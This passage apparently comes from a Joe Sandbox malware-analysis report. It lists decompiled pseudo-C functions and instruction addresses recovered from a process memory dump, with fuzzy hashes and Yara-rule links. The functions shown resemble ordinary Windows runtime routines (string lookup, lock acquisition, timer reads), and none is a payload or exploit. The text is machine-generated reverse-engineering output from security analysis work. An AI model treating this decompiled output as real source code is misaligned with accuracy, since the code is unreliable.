					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x037c52a5
0x037c52ad
0x037c52b0
0x037c52b3
0x037c52b7
0x037c52ba
0x037c52bf
0x037c52c4
0x037c52cc
0x00000000
0x00000000
0x037c52ce
0x037c52d1
0x037c52d9
0x037c52dd
0x037c52e7
0x037c52f7
0x037c52f9
0x037c52fd
0x03820dcf
0x03820dd5
0x03820dd6
0x03820dd7
0x03820dd8
0x03820dd9
0x03820dde
0x03820ddf
0x03820de0
0x03820de1
0x03820de2
0x03820de2
0x03820de5
0x03820dea
0x03820dec
0x03820f60
0x03820f64
0x03820f70
0x03820f76
0x03820f79
0x03820f79
0x00000000
0x03820f64
0x03820df2
0x03820df7
0x03820e04
0x03820e04
0x03820e0d
0x03820e0d
0x03820e10
0x03820e1a
0x03820e1c
0x03820e4c
0x03820e52
0x03820e61
0x03820e67
0x03820e6b
0x03820e70
0x03820e76
0x03820ed7
0x03820edc
0x03820ee0
0x03820ee6
0x03820eea
0x03820eed
0x03820ef0
0x03820ef3
0x03820ef6
0x03820ef9
0x03820efb
0x03820efe
0x03820f01
0x03820f01
0x03820f0b
0x03820f12
0x03820f16
0x03820f18
0x03820f18
0x03820f1b
0x03820f2c
0x03820f31
0x03820f31
0x03820f35
0x03820f39
0x03820f3a
0x03820f3c
0x03820f3c
0x03820f3f
0x03820f50
0x03820f55
0x03820f55
0x03820f59
0x037c52eb
0x037c52f1
0x037c52f1
0x03820e7d
0x03820e84
0x03820e88
0x03820e8a
0x03820e8a
0x03820e8d
0x03820e9e
0x03820ea3
0x03820ea3
0x03820ea7
0x03820eaf
0x03820eb3
0x03820eb9
0x03820eb9
0x03820ebc
0x03820ecd
0x03820ecd
0x00000000
0x03820eb3
0x03820e1e
0x03820e21
0x03820e25
0x03820e2b
0x03820e2f
0x03820e30
0x03820e3a
0x03820e3f
0x03820e41
0x00000000
0x00000000
0x03820e47
0x00000000
0x03820e47
0x03820df9
0x03820dfe
0x00000000
0x00000000
0x00000000
0x03820dfe
0x037c5303
0x037c5307
0x00000000
0x037c5309
0x00000000
0x037c5309
0x037c5307
0x037c52e9
0x037c52e9
0x00000000
0x037c52e9
0x037c530e
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a44e93d402653631b0ba20172093df576ad18a00198314fdf5e0c37e50ce0735
Instruction ID: 406a5b5322543bb70cc4a6823685fa71a9ec635d5e7105313c4f81187bffdafc
Opcode Fuzzy Hash: a44e93d402653631b0ba20172093df576ad18a00198314fdf5e0c37e50ce0735
Instruction Fuzzy Hash: DB51BCB41057829FD721EFA9C845B27BBE8FF84710F14099EE4958B691E774E840CB92

Uniqueness

Uniqueness Score: -1.00%

Function 037F2AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037F2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x38b8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x38b8208; // 0x38b8207
				_t8 = _t57 + 0x38b8208; // 0x38b8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x38b8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x38b821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x38b6d5c; // 0x7f870654
							_t72 =  *0x38b6d5c; // 0x7f870654
							_t75 =  *0x38b6d5c; // 0x7f870654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x38b6d5c; // 0x7f870654
							_t84 =  *0x38b6d5c; // 0x7f870654
							_t87 =  *0x38b6d5c; // 0x7f870654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0380F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x037f2ae4
0x037f2aec
0x037f2aef
0x037f2af4
0x037f2af7
0x037f2afd
0x037f2b92
0x037f2b92
0x037f2b97
0x037f2b9c
0x037f2b9c
0x037f2b03
0x037f2b06
0x037f2b09
0x037f2b09
0x037f2b0f
0x037f2b15
0x037f2b15
0x037f2b1b
0x037f2b1e
0x037f2b21
0x037f2b26
0x037f2b29
0x037f2b81
0x037f2b84
0x037f2c0e
0x037f2c15
0x037f2c24
0x037f2c24
0x037f2b8a
0x037f2b8a
0x037f2b8a
0x037f2b8a
0x037f2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x037f2b4a
0x037f2b4a
0x037f2b4d
0x037f2b53
0x00000000
0x00000000
0x037f2b55
0x037f2b58
0x037f2bb7
0x03835d1b
0x03835d37
0x03835d47
0x03835d53
0x037f2bbd
0x037f2bbd
0x037f2bbd
0x037f2bb7
0x037f2b5d
0x037f2c2f
0x03835d5b
0x03835d77
0x03835d87
0x03835d93
0x037f2c35
0x037f2c35
0x037f2c35
0x037f2c2f
0x037f2b65
0x037f2b9f
0x037f2ba2
0x037f2b67
0x037f2b67
0x037f2b69
0x037f2b6b
0x037f2b6e
0x037f2bc9
0x037f2bcc
0x037f2bcf
0x037f2bd4
0x037f2bd6
0x037f2bd6
0x037f2bdb
0x037f2c02
0x037f2c05
0x037f2c07
0x00000000
0x037f2c07
0x037f2be0
0x037f2c00
0x037f2c3f
0x037f2c3f
0x00000000
0x037f2c00
0x037f2be5
0x037f2be7
0x037f2bec
0x037f2bf4
0x037f2bf6
0x00000000
0x037f2bf6
0x037f2b70
0x037f2b76
0x037f2b2b
0x037f2b2b
0x037f2b2d
0x037f2b2f
0x037f2b32
0x037f2b35
0x037f2b3a
0x00000000
0x037f2b40
0x037f2b43
0x037f2b45
0x037f2b47
0x037f2b4a
0x037f2b4d
0x037f2b53
0x00000000
0x00000000
0x00000000
0x037f2b53
0x037f2b78
0x037f2b78
0x037f2b7b
0x037f2b7e
0x00000000
0x037f2b7e
0x037f2b76
0x037f2ba5
0x037f2ba5
0x037f2ba8
0x037f2bad
0x00000000
0x00000000
0x037f2baf
0x037f2baf
0x037f2bc2
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f6fc652232028542774da92226aa5f2255b602fcec3acd658728a83e5f31d6
Instruction ID: 6e5393e9282511f4d0174e1c5cd204868fcaf0c74e2ed4e155a59b6563825f74
Opcode Fuzzy Hash: 73f6fc652232028542774da92226aa5f2255b602fcec3acd658728a83e5f31d6
Instruction Fuzzy Hash: C051C27AB00116CFCB14DF1CC4809BDB7B5FB88700719899AED46EB366E731AA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0388AE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0388AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0388C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0388ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0388FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0388EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E037E7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E03881608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E03891536(0x38b8ae4, (_t74 -  *0x38b8b04 >> 0x14) + (_t74 -  *0x38b8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0388C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0388A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0386CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0388ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0388ae44
0x0388ae4c
0x0388ae53
0x0388ae55
0x0388ae5c
0x0388ae64
0x0388ae68
0x0388ae75
0x0388ae75
0x0388ae78
0x0388ae7a
0x0388ae7c
0x0388ae7f
0x0388aea8
0x0388aeab
0x0388aead
0x00000000
0x00000000
0x0388aeb3
0x0388aeb8
0x0388aebb
0x0388aebd
0x00000000
0x0388ae81
0x0388ae88
0x0388ae8f
0x0388ae9b
0x0388ae96
0x0388ae96
0x0388ae96
0x0388aea0
0x0388aea3
0x0388aebf
0x0388aebf
0x0388aec3
0x0388aec9
0x0388af0d
0x0388af14
0x0388af3d
0x0388af3d
0x0388af41
0x0388af44
0x0388af67
0x0388af67
0x0388af6a
0x0388afca
0x0388afd1
0x00000000
0x0388afd1
0x0388af6c
0x0388af6d
0x0388af75
0x0388af7c
0x0388af7e
0x0388af80
0x0388af85
0x0388af87
0x0388af99
0x0388af89
0x0388af92
0x0388af92
0x0388af9e
0x0388afa1
0x0388afa3
0x0388afa9
0x0388afb0
0x0388afb2
0x0388afb4
0x0388afbc
0x0388afbc
0x0388afb4
0x0388afb0
0x00000000
0x0388afa1
0x0388af4f
0x0388af57
0x0388af5c
0x0388af5e
0x00000000
0x00000000
0x0388af60
0x0388af64
0x0388af64
0x00000000
0x0388af64
0x0388af1a
0x0388af25
0x00000000
0x00000000
0x0388af27
0x0388af28
0x0388af33
0x00000000
0x0388aed0
0x0388aed0
0x0388aed2
0x0388aee1
0x0388aee4
0x00000000
0x00000000
0x0388aee6
0x0388aeec
0x00000000
0x00000000
0x0388aefb
0x0388af07
0x0388afd3
0x0388afdb
0x0388afdb
0x00000000
0x0388af07
0x0388aed6
0x0388aed8
0x0388aedf
0x00000000
0x00000000
0x00000000
0x0388aedf
0x0388aec9

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4062d5c8cabcaecd8a36bf457dfde64f91c8f14738c7fdfe5c7d82a580d787ec
Instruction ID: f8beb6eb218f74589424259d4e73839ae3d52e6caf5ade3b8f11a70dd3c18539
Opcode Fuzzy Hash: 4062d5c8cabcaecd8a36bf457dfde64f91c8f14738c7fdfe5c7d82a580d787ec
Instruction Fuzzy Hash: 3B41F8717007159BDB2DEBA9C884B3BF399EF84610F0C469AF856CB2D0D738D801C691

Uniqueness

Uniqueness Score: -1.00%

Function 037EDBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E037EDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E037CCC50(E037C4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E037E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E03898ED6(_t102, _t98);
						}
						_t76 = _v44;
						E037E2280(_t58, _v44);
						E037EDD82(_v44, _t102, _t98);
						E037EB944(_t102, _v5);
						return E037DFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x38b8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x38b862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x38b8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x38b862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x388fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x037edbe9
0x037edbf2
0x037edbf7
0x037edbf9
0x037edbfc
0x037edc00
0x037edc03
0x037edc14
0x037edd54
0x037edd54
0x037edd54
0x037edc18
0x037edc1d
0x037edc1d
0x037edc32
0x037edc3b
0x037edc3e
0x037edc46
0x037edd5b
0x037edd62
0x037edd64
0x037edd67
0x037edd69
0x037edd6b
0x037edd6e
0x037edd70
0x037edd73
0x037edd73
0x00000000
0x037edc4c
0x037edc4e
0x03833ae3
0x03833ae8
0x03833aea
0x037edce7
0x037edce9
0x037edcec
0x037edcee
0x037edcf0
0x037edcf3
0x037edcf5
0x03833af2
0x03833af5
0x03833af5
0x037edd06
0x037edd08
0x037edd0b
0x037edd12
0x03833b08
0x037edd18
0x037edd18
0x037edd18
0x037edd20
0x037edd23
0x03833b16
0x03833b16
0x037edd29
0x037edd2d
0x037edd36
0x037edd40
0x037edd51
0x037edd51
0x037edc54
0x037edc59
0x037edc59
0x037edc5e
0x037edc5e
0x037edc63
0x037edc66
0x037edc6b
0x037edc78
0x037edc7b
0x037edc81
0x037edc81
0x037edc83
0x037edc89
0x00000000
0x00000000
0x037edd7b
0x037edd7b
0x037edc8f
0x037edc8f
0x037edc92
0x037edc99
0x037edc9f
0x037edca5
0x037edcaa
0x037edcaa
0x037edcb3
0x037edcb8
0x037edcbb
0x037edcc1
0x037edccf
0x037edcd2
0x037edcd5
0x037edcd7
0x037edcda
0x037edcdc
0x037edcdc
0x037edce2
0x037edce4
0x00000000
0x037edce4

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 413f7e9a33c12d7fa3302afa4b1a4e669ac946615970c314809b23b6709f8c79
Instruction ID: 08342969daf7198d7f3821f860c0f1a43eb907e0fbd92682c89428b603b7992a
Opcode Fuzzy Hash: 413f7e9a33c12d7fa3302afa4b1a4e669ac946615970c314809b23b6709f8c79
Instruction Fuzzy Hash: 6F51BE75A00655CFCB24DFA8C490AAEFBF5BF4D350F24819AD955EB340EB70A944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 037DEF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E037DEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E037C9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77cdc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E037C2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x037def4b
0x037def4d
0x037def57
0x037df0bd
0x037df0c2
0x037df0d2
0x037df0d2
0x037df0c2
0x037def5d
0x037def5f
0x037def67
0x037def6a
0x037def6d
0x037def74
0x037def7f
0x037def82
0x037def82
0x037def86
0x037def88
0x037def8c
0x037def8f
0x037def8f
0x037def8f
0x00000000
0x037def91
0x037def93
0x037defc4
0x037defc4
0x037defc4
0x037defca
0x037defd0
0x037df0a6
0x00000000
0x00000000
0x037df0af
0x0382bb06
0x0382bb0a
0x037df0b5
0x037df0b5
0x037df0b5
0x037df0b5
0x00000000
0x037defd6
0x037defd9
0x037df0de
0x037df0e2
0x037defdf
0x037defdf
0x037defdf
0x037defe5
0x0382bafc
0x0382bafc
0x037defe5
0x037defeb
0x037defed
0x037df00f
0x037df011
0x037df01a
0x037df01d
0x037df021
0x037df028
0x037df029
0x037df029
0x037df02c
0x00000000
0x037df02c
0x037deff3
0x037deff9
0x037df0ea
0x037df0ed
0x037df0ef
0x00000000
0x037df0ef
0x037df003
0x0382bb12
0x037df045
0x037df049
0x037df051
0x037df09e
0x037df0a0
0x037df0a0
0x037df09e
0x037df053
0x037df064
0x037df064
0x037df06b
0x0382bb1a
0x0382bb1a
0x037df071
0x037df071
0x037df07d
0x037df082
0x037df08f
0x037df08f
0x037df009
0x037df00d
0x00000000
0x037df00d
0x037defd0
0x037def97
0x037defa5
0x037defaa
0x00000000
0x037defac
0x037defac
0x037defac
0x00000000
0x037defb2
0x037df036
0x037df03a
0x037df040
0x037df090
0x00000000
0x037df092
0x037df042
0x00000000
0x037df042
0x037defb7
0x037defb9
0x037defbc
0x037defb0
0x037defb0
0x00000000
0x037defbe
0x037defbe
0x037defc1
0x00000000
0x037defc1
0x037defbc
0x037defaa
0x037def91

Memory Dump Source

